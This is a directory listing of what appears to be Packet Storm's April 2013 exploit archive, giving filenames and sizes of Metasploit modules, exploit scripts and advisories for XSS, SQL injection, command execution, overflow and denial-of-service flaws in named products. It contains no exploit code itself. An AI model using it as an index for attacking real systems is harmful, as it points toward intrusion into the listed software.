04/19/2013 04:14 PM 815 kikmessenger-disclose.txt 04/30/2013 03:56 AM 971 killthebox.py.txt 04/30/2013 03:45 AM 2,001 KIS-2013-04.txt 04/17/2013 11:52 PM 3,978 krisonavcms-xssxsrf.txt 04/30/2013 04:04 AM 2,164 linksyse1200n300-xss.txt 04/02/2013 07:45 PM 7,696 linksys_e1500_apply_exec.rb.txt 04/10/2013 06:37 AM 18,523 linksys_wrt54gl_apply_exec.rb.txt 04/16/2013 02:52 AM 1,233 md2pdf-exec.txt 04/15/2013 09:52 PM 1,349 minalicwebserver-overflow.txt 04/19/2013 10:52 PM 4,223 minalic_2_post_winserv03_sp2.py.txt 04/09/2013 06:52 AM 6,885 miniweb-shelltraversal.txt 04/02/2013 07:46 PM 11,778 mongod_native_helper.rb.txt 04/12/2013 05:13 AM 6,001 nagios_nrpe_arguments.rb.txt 04/04/2013 07:29 AM 7,943 netgear_dgn1000b_setup_exec.rb.txt 04/20/2013 05:39 AM 13,730 netgear_dgn2200b_pppoe_exec.rb.txt 04/01/2013 10:52 PM 3,032 networkweathermap-xss.txt 04/19/2013 02:41 PM 925 nginx-inject.txt 04/07/2013 10:52 PM 2,069 otrsfaq-xss.txt 05/01/2013 01:35 AM 1,947 pfshttp-overflow.txt 04/30/2013 04:23 AM 4,895 phpmyadmin_preg_replace.rb.txt 04/28/2013 12:52 AM 1,481 phpvalleymicrojobs-takeover.txt 04/16/2013 12:52 AM 1,677 phpvms-sql.txt 04/30/2013 04:23 AM 7,386 php_wordpress_total_cache.rb.txt 04/04/2013 07:06 AM 843 pollencms-disclose.txt 04/02/2013 10:52 PM 6,087 ponyos-exec.txt 05/01/2013 01:02 PM 0 print.txt 04/23/2013 08:25 PM 1,090 public_phpInjection-smf204.txt 04/04/2013 01:52 PM 671 radiocms-sql.txt 04/01/2013 10:52 PM 723 rubygemldoce-exec.txt 04/03/2013 07:14 PM 8,969 SA-20130403-0.txt 04/04/2013 07:39 PM 5,071 SA-20130404-0.txt 04/09/2013 08:32 AM 3,110 SA-20130408-0.txt 04/17/2013 06:52 PM 5,707 SA-20130417-0.txt 04/17/2013 09:14 PM 7,164 SA-20130417-1.txt 04/18/2013 12:52 AM 4,317 SA-20130417-2.txt 04/19/2013 10:53 AM 2,533 sapconfigservlet-exec.rb.txt 04/30/2013 04:26 AM 4,346 sap_configservlet_exec_noauth.rb.txt 04/18/2013 03:52 PM 4,112 servicestore-xss.txt 04/17/2013 08:52 PM 2,822 sitecomwlm3500-backdoor.txt 04/03/2013 04:30 AM 7,605 smallftpd103-dos.txt 04/03/2013 10:41 PM 2,459 SOS-13-011.txt 04/18/2013 09:52 PM 4,190 swfupload-injectxsrfxss.txt 04/03/2013 11:03 PM 3,255 symphony-sql.txt 04/10/2013 05:03 AM 5,509 sysaxmsssh-dos.txt 05/01/2013 02:12 AM 1,982 syslogwatcherpro-xss.txt 04/03/2013 10:14 PM 2,157 TC-SA-2013-01.txt 04/19/2013 06:03 PM 2,335 tienda-xss.txt 04/29/2013 01:52 PM 1,164 tinymceajax-exec.txt 04/01/2013 01:52 PM 632,912 tinyweb_v1.93_DOS.zip 04/14/2013 03:41 PM 622 todooforum-sqlxss.txt 04/19/2013 03:41 PM 1,892 tplink-freezedos.txt 04/06/2013 11:52 PM 1,965 tplinktd8817-xsrf.txt 04/06/2013 07:14 PM 3,713 twg-disclose.txt 04/19/2013 10:46 AM 6,727 TWSL2013-004.txt 04/08/2013 10:52 PM 2,694 vanilla20184-sql.txt 04/15/2013 05:14 PM 1,079 vanillaforums-xsrf.txt 04/22/2013 06:03 PM 459 vbilling-sql.txt 04/29/2013 02:41 PM 8,205 VL-804.txt 04/21/2013 11:52 PM 977 voipnow-lfi.txt 04/10/2013 06:21 AM 3,013 waraxe-2013-SA102.txt 04/25/2013 10:52 PM 12,421 waraxe-2013-SA103.txt 04/02/2013 06:52 PM 1,648 whmcsgrouppay-sql.txt 04/25/2013 11:25 PM 4,428 windowslight-overflow.txt 05/01/2013 01:41 AM 1,341 wowzamedia-escape.txt 04/01/2013 10:52 PM 4,813 wpfuneralpress-xss.txt 04/26/2013 10:25 PM 11,357 wpsoffice-overflow.tgz 04/11/2013 07:03 AM 2,088 wpspider-sql.txt 04/10/2013 04:52 AM 968 wpspiffy-sql.txt 04/09/2013 04:30 AM 1,703 wptrafficanalyzer-xss.txt 04/10/2013 06:14 AM 1,612 zapms141-sql.txt 04/09/2013 07:23 AM 4,015 zcb-xss.txt 04/02/2013 07:37 PM 4,017 zenworks_control_center_upload.rb.txt 04/17/2013 07:14 PM 2,638 zpanel-exec.txt 04/15/2013 11:52 PM 2,523 ZSL-2013-5136.txt 04/15/2013 11:52 PM 2,812 ZSL-2013-5137.txt 04/16/2013 12:25 AM 5,504 ZSL-2013-5138.txt 120 File(s) 1,150,680 bytes 2 Dir(s) 33,536,339,968 bytes free Download Packet Storm New Exploits For April, 2013 ? Packet Storm